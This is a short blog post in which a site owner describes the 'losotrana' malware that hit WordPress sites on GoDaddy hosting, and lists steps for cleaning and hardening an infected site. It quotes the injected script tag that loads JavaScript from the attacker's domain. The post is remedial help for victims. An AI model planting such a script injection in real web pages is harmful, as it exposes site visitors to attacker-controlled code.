Protect yourself from Losotrana!

Posted by Scott

hacked1st
Well seems some idiot hacked 200+ Godaddy customers using WordPress this morning with me being one of them. The problem was the “losotrana” malware script which was basically a redirect. After a few hours I got everything here locked & cleaned. Here’s hoping I can help anyone else affected and perhaps save you some time fixing the problem.

The script adds <script src=”http://losotrana.com/js.php”></script> at the bottom and a bunch of encoded garbage at the top of every .php file in your hosting account. Since I can’t expect to get notified much less get help from Godaddy here’s what I did.

Try this before going through the trouble of deleting and reinstalling your WordPress.

  1. First – You need to remove the malware script & garbage from your .php files.
    My friends over at Sucuri Security have a free php script that will do just that. It takes just a few moments to run and will clean your files. *Note – Via the web was the best way for me. Just download the file to your desktop and do NOT forget to rename it to wordpress-fix.php. After that, upload it to your site via FTP, and run it via your browser as http://yoursite.com/wordpress-fix.php

  2. Second – Now you should be free of the malware script. It’s time to fix your php files so they will not be affected again. I wrote a script that will CHMOD all your .php files to 444 meaning they will be read only, so they should not be affected by malware like this again. This will save you lots of time versus setting permissions by hand.

    You will however need to change your theme .php files back to writable when you wish to edit them. A small price to pay for being safe. Get the script 444chmodphp (208)

  3. Third – Change all your ftp & WordPress passwords to something more complex which translates to a harder nut to crack for hackers and bots. Use a program like WordPress File Monitor as it will notify via email if your site has a file or files change. In case you forgot to do it already delete the WordPress install.php file.

Hope this helps you clean up if you were affected. It’s not a bad idea to do some or all the things listed in the article anyway.

Buy me a drink! Lord knows I need it.

TwitterRedditFacebookDiggStumbleuponFavoritesMore

Posted in Tech Tags: ,
«
»
You can leave a response, or trackback from your own site.

Leave a Reply

CAPTCHA Image
*

Twitter Reddit Facebook Digg Stumbleupon Favorites More